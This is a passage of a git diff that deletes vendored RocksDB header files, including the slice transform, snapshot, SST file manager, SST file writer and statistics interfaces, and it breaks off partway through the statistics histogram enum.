-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// Class for specifying user-defined functions which perform a
-// transformation on a slice.  It is not required that every slice
-// belong to the domain and/or range of a function.  Subclasses should
-// define InDomain and InRange to determine which slices are in either
-// of these sets respectively.
-
-#ifndef STORAGE_ROCKSDB_INCLUDE_SLICE_TRANSFORM_H_
-#define STORAGE_ROCKSDB_INCLUDE_SLICE_TRANSFORM_H_
-
-#include <string>
-
-namespace rocksdb {
-
-class Slice;
-
-/*
- * A SliceTranform is a generic pluggable way of transforming one string
- * to another. Its primary use-case is in configuring rocksdb
- * to store prefix blooms by setting prefix_extractor in
- * ColumnFamilyOptions.
- */
-class SliceTransform {
- public:
-  virtual ~SliceTransform() {};
-
-  // Return the name of this transformation.
-  virtual const char* Name() const = 0;
-
-  // Extract a prefix from a specified key. This method is called when
-  // a key is inserted into the db, and the returned slice is used to
-  // create a bloom filter.
-  virtual Slice Transform(const Slice& key) const = 0;
-
-  // Determine whether the specified key is compatible with the logic
-  // specified in the Transform method. This method is invoked for every
-  // key that is inserted into the db. If this method returns true,
-  // then Transform is called to translate the key to its prefix and
-  // that returned prefix is inserted into the bloom filter. If this
-  // method returns false, then the call to Transform is skipped and
-  // no prefix is inserted into the bloom filters.
-  //
-  // For example, if the Transform method operates on a fixed length
-  // prefix of size 4, then an invocation to InDomain("abc") returns
-  // false because the specified key length(3) is shorter than the
-  // prefix size of 4.
-  //
-  // Wiki documentation here:
-  // https://github.com/facebook/rocksdb/wiki/Prefix-Seek-API-Changes
-  //
-  virtual bool InDomain(const Slice& key) const = 0;
-
-  // This is currently not used and remains here for backward compatibility.
-  virtual bool InRange(const Slice& dst) const { return false; }
-
-  // Transform(s)=Transform(`prefix`) for any s with `prefix` as a prefix.
-  //
-  // This function is not used by RocksDB, but for users. If users pass
-  // Options by string to RocksDB, they might not know what prefix extractor
-  // they are using. This function is to help users can determine:
-  //   if they want to iterate all keys prefixing `prefix`, whether it is
-  //   safe to use prefix bloom filter and seek to key `prefix`.
-  // If this function returns true, this means a user can Seek() to a prefix
-  // using the bloom filter. Otherwise, user needs to skip the bloom filter
-  // by setting ReadOptions.total_order_seek = true.
-  //
-  // Here is an example: Suppose we implement a slice transform that returns
-  // the first part of the string after spliting it using delimiter ",":
-  // 1. SameResultWhenAppended("abc,") should return true. If applying prefix
-  //    bloom filter using it, all slices matching "abc:.*" will be extracted
-  //    to "abc,", so any SST file or memtable containing any of those key
-  //    will not be filtered out.
-  // 2. SameResultWhenAppended("abc") should return false. A user will not
-  //    guaranteed to see all the keys matching "abc.*" if a user seek to "abc"
-  //    against a DB with the same setting. If one SST file only contains
-  //    "abcd,e", the file can be filtered out and the key will be invisible.
-  //
-  // i.e., an implementation always returning false is safe.
-  virtual bool SameResultWhenAppended(const Slice& prefix) const {
-    return false;
-  }
-};
-
-extern const SliceTransform* NewFixedPrefixTransform(size_t prefix_len);
-
-extern const SliceTransform* NewCappedPrefixTransform(size_t cap_len);
-
-extern const SliceTransform* NewNoopTransform();
-
-}
-
-#endif  // STORAGE_ROCKSDB_INCLUDE_SLICE_TRANSFORM_H_
diff --git a/thirdparty/rocksdb/include/rocksdb/snapshot.h b/thirdparty/rocksdb/include/rocksdb/snapshot.h
deleted file mode 100644
index a96eb76..0000000
--- a/thirdparty/rocksdb/include/rocksdb/snapshot.h
+++ /dev/null
@@ -1,48 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include "rocksdb/types.h"
-
-namespace rocksdb {
-
-class DB;
-
-// Abstract handle to particular state of a DB.
-// A Snapshot is an immutable object and can therefore be safely
-// accessed from multiple threads without any external synchronization.
-//
-// To Create a Snapshot, call DB::GetSnapshot().
-// To Destroy a Snapshot, call DB::ReleaseSnapshot(snapshot).
-class Snapshot {
- public:
-  // returns Snapshot's sequence number
-  virtual SequenceNumber GetSequenceNumber() const = 0;
-
- protected:
-  virtual ~Snapshot();
-};
-
-// Simple RAII wrapper class for Snapshot.
-// Constructing this object will create a snapshot.  Destructing will
-// release the snapshot.
-class ManagedSnapshot {
- public:
-  explicit ManagedSnapshot(DB* db);
-
-  // Instead of creating a snapshot, take ownership of the input snapshot.
-  ManagedSnapshot(DB* db, const Snapshot* _snapshot);
-
-  ~ManagedSnapshot();
-
-  const Snapshot* snapshot();
-
- private:
-  DB* db_;
-  const Snapshot* snapshot_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/sst_dump_tool.h b/thirdparty/rocksdb/include/rocksdb/sst_dump_tool.h
deleted file mode 100644
index 021faa0..0000000
--- a/thirdparty/rocksdb/include/rocksdb/sst_dump_tool.h
+++ /dev/null
@@ -1,17 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#ifndef ROCKSDB_LITE
-#pragma once
-
-namespace rocksdb {
-
-class SSTDumpTool {
- public:
-  int Run(int argc, char** argv);
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/sst_file_manager.h b/thirdparty/rocksdb/include/rocksdb/sst_file_manager.h
deleted file mode 100644
index 692007d..0000000
--- a/thirdparty/rocksdb/include/rocksdb/sst_file_manager.h
+++ /dev/null
@@ -1,85 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <memory>
-#include <string>
-#include <unordered_map>
-
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-class Env;
-class Logger;
-
-// SstFileManager is used to track SST files in the DB and control there
-// deletion rate.
-// All SstFileManager public functions are thread-safe.
-class SstFileManager {
- public:
-  virtual ~SstFileManager() {}
-
-  // Update the maximum allowed space that should be used by RocksDB, if
-  // the total size of the SST files exceeds max_allowed_space, writes to
-  // RocksDB will fail.
-  //
-  // Setting max_allowed_space to 0 will disable this feature, maximum allowed
-  // space will be infinite (Default value).
-  //
-  // thread-safe.
-  virtual void SetMaxAllowedSpaceUsage(uint64_t max_allowed_space) = 0;
-
-  // Return true if the total size of SST files exceeded the maximum allowed
-  // space usage.
-  //
-  // thread-safe.
-  virtual bool IsMaxAllowedSpaceReached() = 0;
-
-  // Return the total size of all tracked files.
-  // thread-safe
-  virtual uint64_t GetTotalSize() = 0;
-
-  // Return a map containing all tracked files and there corresponding sizes.
-  // thread-safe
-  virtual std::unordered_map<std::string, uint64_t> GetTrackedFiles() = 0;
-
-  // Return delete rate limit in bytes per second.
-  // thread-safe
-  virtual int64_t GetDeleteRateBytesPerSecond() = 0;
-
-  // Update the delete rate limit in bytes per second.
-  // zero means disable delete rate limiting and delete files immediately
-  // thread-safe
-  virtual void SetDeleteRateBytesPerSecond(int64_t delete_rate) = 0;
-};
-
-// Create a new SstFileManager that can be shared among multiple RocksDB
-// instances to track SST file and control there deletion rate.
-//
-// @param env: Pointer to Env object, please see "rocksdb/env.h".
-// @param info_log: If not nullptr, info_log will be used to log errors.
-//
-// == Deletion rate limiting specific arguments ==
-// @param trash_dir: Path to the directory where deleted files will be moved
-//    to be deleted in a background thread while applying rate limiting. If this
-//    directory doesn't exist, it will be created. This directory should not be
-//    used by any other process or any other SstFileManager, Set to "" to
-//    disable deletion rate limiting.
-// @param rate_bytes_per_sec: How many bytes should be deleted per second, If
-//    this value is set to 1024 (1 Kb / sec) and we deleted a file of size 4 Kb
-//    in 1 second, we will wait for another 3 seconds before we delete other
-//    files, Set to 0 to disable deletion rate limiting.
-// @param delete_existing_trash: If set to true, the newly created
-//    SstFileManager will delete files that already exist in trash_dir.
-// @param status: If not nullptr, status will contain any errors that happened
-//    during creating the missing trash_dir or deleting existing files in trash.
-extern SstFileManager* NewSstFileManager(
-    Env* env, std::shared_ptr<Logger> info_log = nullptr,
-    std::string trash_dir = "", int64_t rate_bytes_per_sec = 0,
-    bool delete_existing_trash = true, Status* status = nullptr);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/sst_file_writer.h b/thirdparty/rocksdb/include/rocksdb/sst_file_writer.h
deleted file mode 100644
index 04d5c27..0000000
--- a/thirdparty/rocksdb/include/rocksdb/sst_file_writer.h
+++ /dev/null
@@ -1,115 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#pragma once
-
-#include <memory>
-#include <string>
-
-#include "rocksdb/env.h"
-#include "rocksdb/options.h"
-#include "rocksdb/table_properties.h"
-#include "rocksdb/types.h"
-
-#if defined(__GNUC__) || defined(__clang__)
-#define ROCKSDB_DEPRECATED_FUNC __attribute__((__deprecated__))
-#elif _WIN32
-#define ROCKSDB_DEPRECATED_FUNC __declspec(deprecated)
-#endif
-
-namespace rocksdb {
-
-class Comparator;
-
-// ExternalSstFileInfo include information about sst files created
-// using SstFileWriter.
-struct ExternalSstFileInfo {
-  ExternalSstFileInfo() {}
-  ExternalSstFileInfo(const std::string& _file_path,
-                      const std::string& _smallest_key,
-                      const std::string& _largest_key,
-                      SequenceNumber _sequence_number, uint64_t _file_size,
-                      int32_t _num_entries, int32_t _version)
-      : file_path(_file_path),
-        smallest_key(_smallest_key),
-        largest_key(_largest_key),
-        sequence_number(_sequence_number),
-        file_size(_file_size),
-        num_entries(_num_entries),
-        version(_version) {}
-
-  std::string file_path;           // external sst file path
-  std::string smallest_key;        // smallest user key in file
-  std::string largest_key;         // largest user key in file
-  SequenceNumber sequence_number;  // sequence number of all keys in file
-  uint64_t file_size;              // file size in bytes
-  uint64_t num_entries;            // number of entries in file
-  int32_t version;                 // file version
-};
-
-// SstFileWriter is used to create sst files that can be added to database later
-// All keys in files generated by SstFileWriter will have sequence number = 0.
-class SstFileWriter {
- public:
-  // User can pass `column_family` to specify that the generated file will
-  // be ingested into this column_family, note that passing nullptr means that
-  // the column_family is unknown.
-  // If invalidate_page_cache is set to true, SstFileWriter will give the OS a
-  // hint that this file pages is not needed everytime we write 1MB to the file.
-  // To use the rate limiter an io_priority smaller than IO_TOTAL can be passed.
-  SstFileWriter(const EnvOptions& env_options, const Options& options,
-                ColumnFamilyHandle* column_family = nullptr,
-                bool invalidate_page_cache = true,
-                Env::IOPriority io_priority = Env::IOPriority::IO_TOTAL)
-      : SstFileWriter(env_options, options, options.comparator, column_family,
-                      invalidate_page_cache, io_priority) {}
-
-  // Deprecated API
-  SstFileWriter(const EnvOptions& env_options, const Options& options,
-                const Comparator* user_comparator,
-                ColumnFamilyHandle* column_family = nullptr,
-                bool invalidate_page_cache = true,
-                Env::IOPriority io_priority = Env::IOPriority::IO_TOTAL);
-
-  ~SstFileWriter();
-
-  // Prepare SstFileWriter to write into file located at "file_path".
-  Status Open(const std::string& file_path);
-
-  // Add a Put key with value to currently opened file (deprecated)
-  // REQUIRES: key is after any previously added key according to comparator.
-  ROCKSDB_DEPRECATED_FUNC Status Add(const Slice& user_key, const Slice& value);
-
-  // Add a Put key with value to currently opened file
-  // REQUIRES: key is after any previously added key according to comparator.
-  Status Put(const Slice& user_key, const Slice& value);
-
-  // Add a Merge key with value to currently opened file
-  // REQUIRES: key is after any previously added key according to comparator.
-  Status Merge(const Slice& user_key, const Slice& value);
-
-  // Add a deletion key to currently opened file
-  // REQUIRES: key is after any previously added key according to comparator.
-  Status Delete(const Slice& user_key);
-
-  // Finalize writing to sst file and close file.
-  //
-  // An optional ExternalSstFileInfo pointer can be passed to the function
-  // which will be populated with information about the created sst file.
-  Status Finish(ExternalSstFileInfo* file_info = nullptr);
-
-  // Return the current file size.
-  uint64_t FileSize();
-
- private:
-  void InvalidatePageCache(bool closing);
-  struct Rep;
-  std::unique_ptr<Rep> rep_;
-};
-}  // namespace rocksdb
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/statistics.h b/thirdparty/rocksdb/include/rocksdb/statistics.h
deleted file mode 100644
index 731ff78..0000000
--- a/thirdparty/rocksdb/include/rocksdb/statistics.h
+++ /dev/null
@@ -1,481 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef STORAGE_ROCKSDB_INCLUDE_STATISTICS_H_
-#define STORAGE_ROCKSDB_INCLUDE_STATISTICS_H_
-
-#include <atomic>
-#include <cstddef>
-#include <cstdint>
-#include <string>
-#include <memory>
-#include <vector>
-
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-/**
- * Keep adding ticker's here.
- *  1. Any ticker should be added before TICKER_ENUM_MAX.
- *  2. Add a readable string in TickersNameMap below for the newly added ticker.
- *  3. Add a corresponding enum value to TickerType.java in the java API
- */
-enum Tickers : uint32_t {
-  // total block cache misses
-  // REQUIRES: BLOCK_CACHE_MISS == BLOCK_CACHE_INDEX_MISS +
-  //                               BLOCK_CACHE_FILTER_MISS +
-  //                               BLOCK_CACHE_DATA_MISS;
-  BLOCK_CACHE_MISS = 0,
-  // total block cache hit
-  // REQUIRES: BLOCK_CACHE_HIT == BLOCK_CACHE_INDEX_HIT +
-  //                              BLOCK_CACHE_FILTER_HIT +
-  //                              BLOCK_CACHE_DATA_HIT;
-  BLOCK_CACHE_HIT,
-  // # of blocks added to block cache.
-  BLOCK_CACHE_ADD,
-  // # of failures when adding blocks to block cache.
-  BLOCK_CACHE_ADD_FAILURES,
-  // # of times cache miss when accessing index block from block cache.
-  BLOCK_CACHE_INDEX_MISS,
-  // # of times cache hit when accessing index block from block cache.
-  BLOCK_CACHE_INDEX_HIT,
-  // # of index blocks added to block cache.
-  BLOCK_CACHE_INDEX_ADD,
-  // # of bytes of index blocks inserted into cache
-  BLOCK_CACHE_INDEX_BYTES_INSERT,
-  // # of bytes of index block erased from cache
-  BLOCK_CACHE_INDEX_BYTES_EVICT,
-  // # of times cache miss when accessing filter block from block cache.
-  BLOCK_CACHE_FILTER_MISS,
-  // # of times cache hit when accessing filter block from block cache.
-  BLOCK_CACHE_FILTER_HIT,
-  // # of filter blocks added to block cache.
-  BLOCK_CACHE_FILTER_ADD,
-  // # of bytes of bloom filter blocks inserted into cache
-  BLOCK_CACHE_FILTER_BYTES_INSERT,
-  // # of bytes of bloom filter block erased from cache
-  BLOCK_CACHE_FILTER_BYTES_EVICT,
-  // # of times cache miss when accessing data block from block cache.
-  BLOCK_CACHE_DATA_MISS,
-  // # of times cache hit when accessing data block from block cache.
-  BLOCK_CACHE_DATA_HIT,
-  // # of data blocks added to block cache.
-  BLOCK_CACHE_DATA_ADD,
-  // # of bytes of data blocks inserted into cache
-  BLOCK_CACHE_DATA_BYTES_INSERT,
-  // # of bytes read from cache.
-  BLOCK_CACHE_BYTES_READ,
-  // # of bytes written into cache.
-  BLOCK_CACHE_BYTES_WRITE,
-
-  // # of times bloom filter has avoided file reads.
-  BLOOM_FILTER_USEFUL,
-
-  // # persistent cache hit
-  PERSISTENT_CACHE_HIT,
-  // # persistent cache miss
-  PERSISTENT_CACHE_MISS,
-
-  // # total simulation block cache hits
-  SIM_BLOCK_CACHE_HIT,
-  // # total simulation block cache misses
-  SIM_BLOCK_CACHE_MISS,
-
-  // # of memtable hits.
-  MEMTABLE_HIT,
-  // # of memtable misses.
-  MEMTABLE_MISS,
-
-  // # of Get() queries served by L0
-  GET_HIT_L0,
-  // # of Get() queries served by L1
-  GET_HIT_L1,
-  // # of Get() queries served by L2 and up
-  GET_HIT_L2_AND_UP,
-
-  /**
-   * COMPACTION_KEY_DROP_* count the reasons for key drop during compaction
-   * There are 4 reasons currently.
-   */
-  COMPACTION_KEY_DROP_NEWER_ENTRY,  // key was written with a newer value.
-                                    // Also includes keys dropped for range del.
-  COMPACTION_KEY_DROP_OBSOLETE,     // The key is obsolete.
-  COMPACTION_KEY_DROP_RANGE_DEL,    // key was covered by a range tombstone.
-  COMPACTION_KEY_DROP_USER,  // user compaction function has dropped the key.
-  COMPACTION_RANGE_DEL_DROP_OBSOLETE,  // all keys in range were deleted.
-  // Deletions obsoleted before bottom level due to file gap optimization.
-  COMPACTION_OPTIMIZED_DEL_DROP_OBSOLETE,
-
-  // Number of keys written to the database via the Put and Write call's
-  NUMBER_KEYS_WRITTEN,
-  // Number of Keys read,
-  NUMBER_KEYS_READ,
-  // Number keys updated, if inplace update is enabled
-  NUMBER_KEYS_UPDATED,
-  // The number of uncompressed bytes issued by DB::Put(), DB::Delete(),
-  // DB::Merge(), and DB::Write().
-  BYTES_WRITTEN,
-  // The number of uncompressed bytes read from DB::Get().  It could be
-  // either from memtables, cache, or table files.
-  // For the number of logical bytes read from DB::MultiGet(),
-  // please use NUMBER_MULTIGET_BYTES_READ.
-  BYTES_READ,
-  // The number of calls to seek/next/prev
-  NUMBER_DB_SEEK,
-  NUMBER_DB_NEXT,
-  NUMBER_DB_PREV,
-  // The number of calls to seek/next/prev that returned data
-  NUMBER_DB_SEEK_FOUND,
-  NUMBER_DB_NEXT_FOUND,
-  NUMBER_DB_PREV_FOUND,
-  // The number of uncompressed bytes read from an iterator.
-  // Includes size of key and value.
-  ITER_BYTES_READ,
-  NO_FILE_CLOSES,
-  NO_FILE_OPENS,
-  NO_FILE_ERRORS,
-  // DEPRECATED Time system had to wait to do LO-L1 compactions
-  STALL_L0_SLOWDOWN_MICROS,
-  // DEPRECATED Time system had to wait to move memtable to L1.
-  STALL_MEMTABLE_COMPACTION_MICROS,
-  // DEPRECATED write throttle because of too many files in L0
-  STALL_L0_NUM_FILES_MICROS,
-  // Writer has to wait for compaction or flush to finish.
-  STALL_MICROS,
-  // The wait time for db mutex.
-  // Disabled by default. To enable it set stats level to kAll
-  DB_MUTEX_WAIT_MICROS,
-  RATE_LIMIT_DELAY_MILLIS,
-  NO_ITERATORS,  // number of iterators currently open
-
-  // Number of MultiGet calls, keys read, and bytes read
-  NUMBER_MULTIGET_CALLS,
-  NUMBER_MULTIGET_KEYS_READ,
-  NUMBER_MULTIGET_BYTES_READ,
-
-  // Number of deletes records that were not required to be
-  // written to storage because key does not exist
-  NUMBER_FILTERED_DELETES,
-  NUMBER_MERGE_FAILURES,
-
-  // number of times bloom was checked before creating iterator on a
-  // file, and the number of times the check was useful in avoiding
-  // iterator creation (and thus likely IOPs).
-  BLOOM_FILTER_PREFIX_CHECKED,
-  BLOOM_FILTER_PREFIX_USEFUL,
-
-  // Number of times we had to reseek inside an iteration to skip
-  // over large number of keys with same userkey.
-  NUMBER_OF_RESEEKS_IN_ITERATION,
-
-  // Record the number of calls to GetUpadtesSince. Useful to keep track of
-  // transaction log iterator refreshes
-  GET_UPDATES_SINCE_CALLS,
-  BLOCK_CACHE_COMPRESSED_MISS,  // miss in the compressed block cache
-  BLOCK_CACHE_COMPRESSED_HIT,   // hit in the compressed block cache
-  // Number of blocks added to compressed block cache
-  BLOCK_CACHE_COMPRESSED_ADD,
-  // Number of failures when adding blocks to compressed block cache
-  BLOCK_CACHE_COMPRESSED_ADD_FAILURES,
-  WAL_FILE_SYNCED,  // Number of times WAL sync is done
-  WAL_FILE_BYTES,   // Number of bytes written to WAL
-
-  // Writes can be processed by requesting thread or by the thread at the
-  // head of the writers queue.
-  WRITE_DONE_BY_SELF,
-  WRITE_DONE_BY_OTHER,  // Equivalent to writes done for others
-  WRITE_TIMEDOUT,       // Number of writes ending up with timed-out.
-  WRITE_WITH_WAL,       // Number of Write calls that request WAL
-  COMPACT_READ_BYTES,   // Bytes read during compaction
-  COMPACT_WRITE_BYTES,  // Bytes written during compaction
-  FLUSH_WRITE_BYTES,    // Bytes written during flush
-
-  // Number of table's properties loaded directly from file, without creating
-  // table reader object.
-  NUMBER_DIRECT_LOAD_TABLE_PROPERTIES,
-  NUMBER_SUPERVERSION_ACQUIRES,
-  NUMBER_SUPERVERSION_RELEASES,
-  NUMBER_SUPERVERSION_CLEANUPS,
-
-  // # of compressions/decompressions executed
-  NUMBER_BLOCK_COMPRESSED,
-  NUMBER_BLOCK_DECOMPRESSED,
-
-  NUMBER_BLOCK_NOT_COMPRESSED,
-  MERGE_OPERATION_TOTAL_TIME,
-  FILTER_OPERATION_TOTAL_TIME,
-
-  // Row cache.
-  ROW_CACHE_HIT,
-  ROW_CACHE_MISS,
-
-  // Read amplification statistics.
-  // Read amplification can be calculated using this formula
-  // (READ_AMP_TOTAL_READ_BYTES / READ_AMP_ESTIMATE_USEFUL_BYTES)
-  //
-  // REQUIRES: ReadOptions::read_amp_bytes_per_bit to be enabled
-  READ_AMP_ESTIMATE_USEFUL_BYTES,  // Estimate of total bytes actually used.
-  READ_AMP_TOTAL_READ_BYTES,       // Total size of loaded data blocks.
-
-  // Number of refill intervals where rate limiter's bytes are fully consumed.
-  NUMBER_RATE_LIMITER_DRAINS,
-
-  TICKER_ENUM_MAX
-};
-
-// The order of items listed in  Tickers should be the same as
-// the order listed in TickersNameMap
-const std::vector<std::pair<Tickers, std::string>> TickersNameMap = {
-    {BLOCK_CACHE_MISS, "rocksdb.block.cache.miss"},
-    {BLOCK_CACHE_HIT, "rocksdb.block.cache.hit"},
-    {BLOCK_CACHE_ADD, "rocksdb.block.cache.add"},
-    {BLOCK_CACHE_ADD_FAILURES, "rocksdb.block.cache.add.failures"},
-    {BLOCK_CACHE_INDEX_MISS, "rocksdb.block.cache.index.miss"},
-    {BLOCK_CACHE_INDEX_HIT, "rocksdb.block.cache.index.hit"},
-    {BLOCK_CACHE_INDEX_ADD, "rocksdb.block.cache.index.add"},
-    {BLOCK_CACHE_INDEX_BYTES_INSERT, "rocksdb.block.cache.index.bytes.insert"},
-    {BLOCK_CACHE_INDEX_BYTES_EVICT, "rocksdb.block.cache.index.bytes.evict"},
-    {BLOCK_CACHE_FILTER_MISS, "rocksdb.block.cache.filter.miss"},
-    {BLOCK_CACHE_FILTER_HIT, "rocksdb.block.cache.filter.hit"},
-    {BLOCK_CACHE_FILTER_ADD, "rocksdb.block.cache.filter.add"},
-    {BLOCK_CACHE_FILTER_BYTES_INSERT,
-     "rocksdb.block.cache.filter.bytes.insert"},
-    {BLOCK_CACHE_FILTER_BYTES_EVICT, "rocksdb.block.cache.filter.bytes.evict"},
-    {BLOCK_CACHE_DATA_MISS, "rocksdb.block.cache.data.miss"},
-    {BLOCK_CACHE_DATA_HIT, "rocksdb.block.cache.data.hit"},
-    {BLOCK_CACHE_DATA_ADD, "rocksdb.block.cache.data.add"},
-    {BLOCK_CACHE_DATA_BYTES_INSERT, "rocksdb.block.cache.data.bytes.insert"},
-    {BLOCK_CACHE_BYTES_READ, "rocksdb.block.cache.bytes.read"},
-    {BLOCK_CACHE_BYTES_WRITE, "rocksdb.block.cache.bytes.write"},
-    {BLOOM_FILTER_USEFUL, "rocksdb.bloom.filter.useful"},
-    {PERSISTENT_CACHE_HIT, "rocksdb.persistent.cache.hit"},
-    {PERSISTENT_CACHE_MISS, "rocksdb.persistent.cache.miss"},
-    {SIM_BLOCK_CACHE_HIT, "rocksdb.sim.block.cache.hit"},
-    {SIM_BLOCK_CACHE_MISS, "rocksdb.sim.block.cache.miss"},
-    {MEMTABLE_HIT, "rocksdb.memtable.hit"},
-    {MEMTABLE_MISS, "rocksdb.memtable.miss"},
-    {GET_HIT_L0, "rocksdb.l0.hit"},
-    {GET_HIT_L1, "rocksdb.l1.hit"},
-    {GET_HIT_L2_AND_UP, "rocksdb.l2andup.hit"},
-    {COMPACTION_KEY_DROP_NEWER_ENTRY, "rocksdb.compaction.key.drop.new"},
-    {COMPACTION_KEY_DROP_OBSOLETE, "rocksdb.compaction.key.drop.obsolete"},
-    {COMPACTION_KEY_DROP_RANGE_DEL, "rocksdb.compaction.key.drop.range_del"},
-    {COMPACTION_KEY_DROP_USER, "rocksdb.compaction.key.drop.user"},
-    {COMPACTION_RANGE_DEL_DROP_OBSOLETE,
-      "rocksdb.compaction.range_del.drop.obsolete"},
-    {COMPACTION_OPTIMIZED_DEL_DROP_OBSOLETE,
-      "rocksdb.compaction.optimized.del.drop.obsolete"},
-    {NUMBER_KEYS_WRITTEN, "rocksdb.number.keys.written"},
-    {NUMBER_KEYS_READ, "rocksdb.number.keys.read"},
-    {NUMBER_KEYS_UPDATED, "rocksdb.number.keys.updated"},
-    {BYTES_WRITTEN, "rocksdb.bytes.written"},
-    {BYTES_READ, "rocksdb.bytes.read"},
-    {NUMBER_DB_SEEK, "rocksdb.number.db.seek"},
-    {NUMBER_DB_NEXT, "rocksdb.number.db.next"},
-    {NUMBER_DB_PREV, "rocksdb.number.db.prev"},
-    {NUMBER_DB_SEEK_FOUND, "rocksdb.number.db.seek.found"},
-    {NUMBER_DB_NEXT_FOUND, "rocksdb.number.db.next.found"},
-    {NUMBER_DB_PREV_FOUND, "rocksdb.number.db.prev.found"},
-    {ITER_BYTES_READ, "rocksdb.db.iter.bytes.read"},
-    {NO_FILE_CLOSES, "rocksdb.no.file.closes"},
-    {NO_FILE_OPENS, "rocksdb.no.file.opens"},
-    {NO_FILE_ERRORS, "rocksdb.no.file.errors"},
-    {STALL_L0_SLOWDOWN_MICROS, "rocksdb.l0.slowdown.micros"},
-    {STALL_MEMTABLE_COMPACTION_MICROS, "rocksdb.memtable.compaction.micros"},
-    {STALL_L0_NUM_FILES_MICROS, "rocksdb.l0.num.files.stall.micros"},
-    {STALL_MICROS, "rocksdb.stall.micros"},
-    {DB_MUTEX_WAIT_MICROS, "rocksdb.db.mutex.wait.micros"},
-    {RATE_LIMIT_DELAY_MILLIS, "rocksdb.rate.limit.delay.millis"},
-    {NO_ITERATORS, "rocksdb.num.iterators"},
-    {NUMBER_MULTIGET_CALLS, "rocksdb.number.multiget.get"},
-    {NUMBER_MULTIGET_KEYS_READ, "rocksdb.number.multiget.keys.read"},
-    {NUMBER_MULTIGET_BYTES_READ, "rocksdb.number.multiget.bytes.read"},
-    {NUMBER_FILTERED_DELETES, "rocksdb.number.deletes.filtered"},
-    {NUMBER_MERGE_FAILURES, "rocksdb.number.merge.failures"},
-    {BLOOM_FILTER_PREFIX_CHECKED, "rocksdb.bloom.filter.prefix.checked"},
-    {BLOOM_FILTER_PREFIX_USEFUL, "rocksdb.bloom.filter.prefix.useful"},
-    {NUMBER_OF_RESEEKS_IN_ITERATION, "rocksdb.number.reseeks.iteration"},
-    {GET_UPDATES_SINCE_CALLS, "rocksdb.getupdatessince.calls"},
-    {BLOCK_CACHE_COMPRESSED_MISS, "rocksdb.block.cachecompressed.miss"},
-    {BLOCK_CACHE_COMPRESSED_HIT, "rocksdb.block.cachecompressed.hit"},
-    {BLOCK_CACHE_COMPRESSED_ADD, "rocksdb.block.cachecompressed.add"},
-    {BLOCK_CACHE_COMPRESSED_ADD_FAILURES,
-     "rocksdb.block.cachecompressed.add.failures"},
-    {WAL_FILE_SYNCED, "rocksdb.wal.synced"},
-    {WAL_FILE_BYTES, "rocksdb.wal.bytes"},
-    {WRITE_DONE_BY_SELF, "rocksdb.write.self"},
-    {WRITE_DONE_BY_OTHER, "rocksdb.write.other"},
-    {WRITE_TIMEDOUT, "rocksdb.write.timeout"},
-    {WRITE_WITH_WAL, "rocksdb.write.wal"},
-    {COMPACT_READ_BYTES, "rocksdb.compact.read.bytes"},
-    {COMPACT_WRITE_BYTES, "rocksdb.compact.write.bytes"},
-    {FLUSH_WRITE_BYTES, "rocksdb.flush.write.bytes"},
-    {NUMBER_DIRECT_LOAD_TABLE_PROPERTIES,
-     "rocksdb.number.direct.load.table.properties"},
-    {NUMBER_SUPERVERSION_ACQUIRES, "rocksdb.number.superversion_acquires"},
-    {NUMBER_SUPERVERSION_RELEASES, "rocksdb.number.superversion_releases"},
-    {NUMBER_SUPERVERSION_CLEANUPS, "rocksdb.number.superversion_cleanups"},
-    {NUMBER_BLOCK_COMPRESSED, "rocksdb.number.block.compressed"},
-    {NUMBER_BLOCK_DECOMPRESSED, "rocksdb.number.block.decompressed"},
-    {NUMBER_BLOCK_NOT_COMPRESSED, "rocksdb.number.block.not_compressed"},
-    {MERGE_OPERATION_TOTAL_TIME, "rocksdb.merge.operation.time.nanos"},
-    {FILTER_OPERATION_TOTAL_TIME, "rocksdb.filter.operation.time.nanos"},
-    {ROW_CACHE_HIT, "rocksdb.row.cache.hit"},
-    {ROW_CACHE_MISS, "rocksdb.row.cache.miss"},
-    {READ_AMP_ESTIMATE_USEFUL_BYTES, "rocksdb.read.amp.estimate.useful.bytes"},
-    {READ_AMP_TOTAL_READ_BYTES, "rocksdb.read.amp.total.read.bytes"},
-    {NUMBER_RATE_LIMITER_DRAINS, "rocksdb.number.rate_limiter.drains"},
-};
-
-/**
- * Keep adding histogram's here.
- * Any histogram should have value less than HISTOGRAM_ENUM_MAX
- * Add a new Histogram by assigning it the current value of HISTOGRAM_ENUM_MAX
- * Add a string representation in HistogramsNameMap below
- * And increment HISTOGRAM_ENUM_MAX
- * Add a corresponding enum value to HistogramType.java in the java API
- */
-enum Histograms : uint32_t {
-  DB_GET = 0,
-  DB_WRITE,
-  COMPACTION_TIME,
-  SUBCOMPACTION_SETUP_TIME,
-  TABLE_SYNC_MICROS,
-  COMPACTION_OUTFILE_SYNC_MICROS,
-  WAL_FILE_SYNC_MICROS,
